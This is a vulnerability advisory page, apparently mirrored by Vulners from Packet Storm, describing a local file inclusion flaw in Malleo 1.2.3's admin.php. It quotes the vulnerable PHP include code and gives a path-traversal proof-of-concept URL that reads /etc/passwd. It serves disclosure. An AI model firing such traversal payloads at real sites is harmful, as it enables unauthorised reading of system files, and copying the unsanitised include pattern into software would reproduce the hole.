Lucene search
K

Malleo 1.2.3 Local File Inclusion

🗓️ 18 Apr 2009 00:00:00Reported by Salvatore FrestaType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 21 Views

Malleo 1.2.3 Local File Inclusion, Remote Exploitation, Low Ris

Code
`******* Salvatore "drosophila" Fresta *******  
  
[+] Application: Malleo  
[+] Version: 1.2.3  
[+] Website: http://www.malleo-cms.com  
  
[+] Bugs: [A] Local File Inclusion  
  
[+] Exploitation: Remote  
[+] Date: 17 Apr 2009  
  
[+] Discovered by: Salvatore "drosophila" Fresta  
[+] Author: Salvatore "drosophila" Fresta  
[+] Contact: e-mail: [email protected]  
  
  
*************************************************  
  
[+] Menu  
  
1) Bugs  
2) Code  
3) Fix  
  
  
*************************************************  
  
[+] Bugs  
  
  
- [A] Local File Inclusion  
  
[-] Risk: low  
[-] File affected: admin.php  
  
This bug allows a privileged user to include local  
files. I decided to publish this bug for reporting  
security flaw only. The following is the vulnerable  
code:  
  
...  
  
$module = (isset($_GET['module']))?  
$_GET['module']:$cf->config['default_module_admin'];  
  
...  
  
}else{  
// Mise a jour de la date d'activite de la session fondateur  
if ($cf->config['activer_digicode']) $_SESSION['digicode_TTL'] = time();  
if (file_exists($root.$module))  
{  
include_once($root.$module);  
  
...  
  
  
*************************************************  
  
[+] Code  
  
  
- [A] Local File Inclusion  
  
http://www.site.com/path/admin.php?module=../../../../../etc/passwd  
  
  
*************************************************  
  
[+] Fix  
  
No fix.  
  
  
*************************************************  
  
--   
Salvatore "drosophila" Fresta  
CWNP444351  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

18 Apr 2009 00:00Current
7.4High risk
Vulners AI Score7.4
21